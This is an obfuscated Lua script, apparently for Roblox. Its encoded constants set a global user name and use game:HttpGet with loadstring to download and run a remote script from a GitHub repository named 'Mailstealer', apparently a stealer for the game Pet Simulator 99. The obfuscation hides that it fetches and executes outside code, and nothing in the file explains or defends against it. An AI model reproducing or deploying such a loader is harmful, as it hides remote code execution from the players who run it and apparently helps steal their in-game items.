--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v70=(v31/((5 -(1 + 2))^(v32-(2 -1))))%(2^(((v33-1) -(v32-1)) + ((878 -(282 + 595)) -(1637 -(1523 + 114))))) ;return v70-(v70%(2 -1)) ;else local v71=(621 -(499 + 56 + 64))^(v32-(932 -(857 + 74))) ;return (((v31%(v71 + v71))>=v71) and (569 -(367 + 201))) or (927 -(54 + 160 + 713)) ;end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34=(957 -(892 + 65)) -0 ;local v35;local v36;local v37;local v38;while true do if (v34==(1066 -(68 + 997))) then return (v38 * 16777216) + (v37 * (66806 -(226 + 1044))) + (v36 * (1114 -858)) + v35 ;end if (0==v34) then v35,v36,v37,v38=v1(v16,v19,v19 + (120 -(32 + 85)) );v19=v19 + (9 -5) + 0 ;v34=1 + 0 ;end end end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v39=0;local v40;local v41;local v42;local v43;local v44;local v45;local v46;while true do if (v39==(822 -(436 + 383))) then v46=nil;while true do local v77=14 -(9 + 5) ;local v78;while true do if (v77~=(376 -(85 + 291))) then else v78=0;while true do if ((1265 -(243 + 1022))~=v78) then else local v105=0 -0 ;while true do if (v105==(1 + 0)) then v78=1181 -(1123 + 57) ;break;end if (v105==0) then if (v40~=1) then else local v151=0;while true do if (v151==0) then v45=v24();v46={};v151=1 + 0 ;end if (v151==2) then v40=256 -(163 + 91) ;break;end if ((1931 -(1869 + 61))==v151) then for v165=1 + 0 ,v45 do local v166=0 -0 ;local v167;local v168;local v169;while true do if (v166==1) then v169=nil;while true do if (v167==(0 -0)) then local v175=0;while true do if (v175==1) then v167=1;break;end if (v175==(0 + 0)) then v168=v22();v169=nil;v175=1;end end end if (v167==1) then if (v168==1) then v169=v22()~=(0 -0) ;elseif (v168==(2 + 0)) then v169=v25();elseif (v168==3) then v169=v26();end v46[v165]=v169;break;end end break;end if (v166~=(1474 -(1329 + 145))) then else v167=0;v168=nil;v166=1;end end end v44[3]=v22();v151=973 -(140 + 831) ;end end end if (v40==2) then local v152=0;local v153;while true do if (v152~=(1850 -(1409 + 441))) then else v153=0;while true do if (0==v153) then for v170=719 -(15 + 703) ,v24() do local v171=0 + 0 ;local v172;while true do if (v171==(438 -(262 + 176))) then v172=v22();if (v21(v172,1722 -(345 + 1376) ,689 -(198 + 490) )~=(0 -0)) then else local v177=0;local v178;local v179;local v180;local v181;while true do if (v177~=(0 -0)) then else v178=0;v179=nil;v177=1;end if (v177==(1207 -(696 + 510))) then v180=nil;v181=nil;v177=3 -1 ;end if (2==v177) then while true do if ((1262 -(1091 + 171))==v178) then local v182=0 + 0 ;while true do if (v182~=(0 -0)) then else local v188=0;while true do if (v188~=(3 -2)) then else v182=375 -(123 + 251) ;break;end if (v188~=(0 -0)) then else v179=v21(v172,700 -(208 + 490) ,1 + 2 );v180=v21(v172,2 + 2 ,842 -(660 + 176) );v188=1 + 0 ;end end end if (v182~=1) then else v178=1;break;end end end if ((204 -(14 + 188))==v178) then local v183=0;while true do if ((675 -(534 + 141))~=v183) then else if (v21(v180,1 + 0 ,1)~=1) then else v181[2 + 0 ]=v46[v181[2]];end if (v21(v180,2,2)==1) then v181[3]=v46[v181[3]];end v183=1 + 0 ;end if (v183~=1) then else v178=6 -3 ;break;end end end if (v178~=3) then else if (v21(v180,4 -1 ,3)~=(2 -1)) then else v181[3 + 1 ]=v46[v181[3 + 1 ]];end v41[v170]=v181;break;end if (v178~=(397 -(115 + 281))) then else local v185=0 -0 ;while true do if (v185~=1) then else v178=2;break;end if (v185==0) then v181={v23(),v23(),nil,nil};if (v179==0) then local v193=867 -(550 + 317) ;local v194;while true do if (v193~=0) then else v194=0 -0 ;while true do if (v194==(0 -0)) then v181[3]=v23();v181[11 -7 ]=v23();break;end end break;end end elseif (v179==1) then v181[3]=v24();elseif (v179==2) then v181[3]=v24() -(2^(301 -(134 + 151))) ;elseif (v179~=3) then else local v199=0;while true do if (v199==0) then v181[1668 -(970 + 695) ]=v24() -(2^(30 -14)) ;v181[1994 -(582 + 1408) ]=v23();break;end end end v185=3 -2 ;end end end end break;end end end break;end end end for v173=1,v24() do v42[v173-1 ]=v29();end v153=1;end if (1==v153) then return v44;end end break;end end end v105=1 -0 ;end end end if (v78~=(3 -2)) then else if (v40~=(1824 -(1195 + 629))) then else local v111=0 -0 ;local v112;while true do if (v111==0) then v112=241 -(187 + 54) ;while true do if (v112==(780 -(162 + 618))) then local v164=0;while true do if (v164~=1) then else v112=1;break;end if (v164==(0 + 0)) then v41={};v42={};v164=1;end end end if (v112==2) then v40=1;break;end if ((1 + 0)~=v112) then else v43={};v44={v41,v42,nil,v43};v112=2;end end break;end end end break;end end break;end end end break;end if (v39==(0 -0)) then v40=0;v41=nil;v39=1 + 0 ;end if (v39==(1637 -(1373 + 263))) then v42=nil;v43=nil;v39=2;end if (v39==(1002 -(451 + 549))) then v44=nil;v45=nil;v39=1 + 2 ;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v47=0 -0 ;local v48;local v49;local v50;local v51;local v52;local v53;while true do if ((1 -0)==v47) then v50=1 -0 ;v51=(v21(v49,1385 -(746 + 638) ,8 + 12 ) * (((1 + 1) -0)^32)) + v48 ;v47=343 -(218 + 123) ;end if (v47==2) then v52=v21(v49,1602 -(1535 + 46) ,731 -(271 + 429) );v53=((v21(v49,30 + 2 )==(1501 -(1408 + 92))) and  -(1087 -(461 + (1770 -(466 + 679))))) or (1 + (0 -0)) ;v47=1 + 2 ;end if (v47==((1601 -1041) -(306 + 254))) then v48=v24();v49=v24();v47=1 + (1900 -(106 + 1794)) ;end if (v47==(5 -2)) then if (v52==((465 + 1002) -(899 + 568))) then if (v51==(0 + 0 + (0 -0))) then return v53 * (0 -0) ;else v52=604 -(268 + (907 -572)) ;v50=(404 -(4 + 110)) -(60 + 230) ;end elseif (v52==(2576 -(406 + 123))) then return ((v51==(572 -(426 + 146))) and (v53 * ((1 + 0)/((2040 -(57 + 527)) -(282 + 1174))))) or (v53 * NaN) ;end return v8(v53,v52-(243 + 780) ) * (v50 + (v51/(((2240 -(41 + 1386)) -(569 + 242))^(155 -(17 + 86))))) ;end end end v26=nil;function v26(v54)local v55=0 + 0 ;local v56;local v57;while true do if (v55==2) then v57={};for v79=1 -0 , #v56 do v57[v79]=v2(v1(v3(v56,v79,v79)));end v55=8 -5 ;end if (v55==0) then v56=nil;if  not v54 then local v97=166 -(122 + 44) ;while true do if (v97==(0 -0)) then v54=v24();if (v54==(0 -0)) then return "";end break;end end end v55=1 + 0 ;end if (v55==1) then v56=v3(v16,v19,(v19 + v54) -(1 + 0) );v19=v19 + v54 ;v55=3 -1 ;end if (v55==(68 -(21 + 9 + 35))) then return v6(v57);end end end v18=5;end if (v18==2) then function v22()local v58=0;local v59;while true do if (v58==0) then v59=v1(v16,v19,v19);v19=v19 + (1258 -(1043 + 214)) ;v58=3 -2 ;end if (v58==((3264 -2051) -(323 + 889))) then return v59;end end end v23=nil;function v23()local v60,v61=v1(v16,v19,v19 + (582 -(361 + 219)) );v19=v19 + (322 -(53 + 267)) ;return (v61 * (58 + 198)) + v60 ;end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v62)if (v1(v62,2)==79) then local v72=0;while true do if (v72==0) then v20=v0(v3(v62,1,1));return "";end end else local v73=v2(v0(v62,16));if v20 then local v81=0;local v82;while true do if (v81==1) then return v82;end if (v81==0) then v82=v5(v73,v20);v20=nil;v81=1;end end else return v73;end end end);v18=1;end if (v18==7) then function v30(v63,v64,v65)local v66=0;local v67;local v68;local v69;while true do if (v66==0) then v67=v63[1];v68=v63[2];v66=1;end if (v66==1) then v69=v63[3];return function(...)local v83=v67;local v84=v68;local v85=v69;local v86=v28;local v87=1;local v88= -1;local v89={};local v90={...};local v91=v12("#",...) -1 ;local v92={};local v93={};for v98=0,v91 do if (v98>=v85) then v89[v98-v85 ]=v90[v98 + 1 ];else v93[v98]=v90[v98 + 1 ];end end local v94=(v91-v85) + 1 ;local v95;local v96;while true do v95=v83[v87];v96=v95[1];if (v96<=5) then if (v96<=2) then if (v96<=0) then v93[v95[2]]=v95[3];elseif (v96==1) then do return;end else local v113=v95[2];v93[v113]=v93[v113](v13(v93,v113 + 1 ,v88));end elseif (v96<=3) then local v108=0;local v109;local v110;while true do if (v108==0) then v109=v95[2];v110=v93[v95[3]];v108=1;end if (1==v108) then v93[v109 + 1 ]=v110;v93[v109]=v110[v95[4]];break;end end elseif (v96==4) then local v115;local v116,v117;local v118;local v119;v65[v95[3]]=v93[v95[2]];v87=v87 + 1 ;v95=v83[v87];if ((v95[3]=="_ENV") or (v95[3]=="getfenv")) then v93[v95[2]]=v65;else v93[v95[2]]=v65[v95[3]];end v87=v87 + 1 ;v95=v83[v87];if ((v95[3]=="_ENV") or (v95[3]=="getfenv")) then v93[v95[2]]=v65;else v93[v95[2]]=v65[v95[3]];end v87=v87 + 1 ;v95=v83[v87];v119=v95[2];v118=v93[v95[3]];v93[v119 + 1 ]=v118;v93[v119]=v118[v95[4]];v87=v87 + 1 ;v95=v83[v87];v93[v95[2]]=v95[3];v87=v87 + 1 ;v95=v83[v87];v93[v95[2]]=v95[3]~=0 ;v87=v87 + 1 ;v95=v83[v87];v119=v95[2];v116,v117=v86(v93[v119](v13(v93,v119 + 1 ,v95[3])));v88=(v117 + v119) -1 ;v115=0;for v143=v119,v88 do v115=v115 + 1 ;v93[v143]=v116[v115];end v87=v87 + 1 ;v95=v83[v87];v119=v95[2];v93[v119]=v93[v119](v13(v93,v119 + 1 ,v88));v87=v87 + 1 ;v95=v83[v87];v93[v95[2]]();v87=v87 + 1 ;v95=v83[v87];v87=v95[3];else v93[v95[2]]=v95[3]~=0 ;end elseif (v96<=8) then if (v96<=6) then if (v93[v95[2]]==v95[4]) then v87=v87 + 1 ;else v87=v95[3];end elseif (v96==7) then v93[v95[2]]();else for v146=v95[2],v95[3] do v93[v146]=nil;end end elseif (v96<=10) then if (v96>9) then if ((v95[3]=="_ENV") or (v95[3]=="getfenv")) then v93[v95[2]]=v65;else v93[v95[2]]=v65[v95[3]];end else v65[v95[3]]=v93[v95[2]];end elseif (v96==11) then v87=v95[3];else local v134=v95[2];local v135,v136=v86(v93[v134](v13(v93,v134 + 1 ,v95[3])));v88=(v136 + v134) -1 ;local v137=0;for v148=v134,v88 do v137=v137 + 1 ;v93[v148]=v135[v137];end end v87=v87 + 1 ;end end;end end end return v30(v29(),{},v17)(...);end end end v15("LOL!073O00028O0003043O007573657203133O0074726F6E697874686562696762726F74686572030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403453O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F6D2O61726C2O6F77312F4D61696C737465616C65722F6D61696E2F70732O392E74787400163O00124O00014O0008000100013O0026063O00020001000100040B3O0002000100122O000100013O002606000100050001000100040B3O0005000100122O000200033O001204000200023O00122O000200043O00122O000300053O00202O00030003000600122O000500076O000600016O000300066O00023O00024O00020001000100044O0015000100040B3O0005000100040B3O0015000100040B3O000200012O00013O00017O00",v9(),...);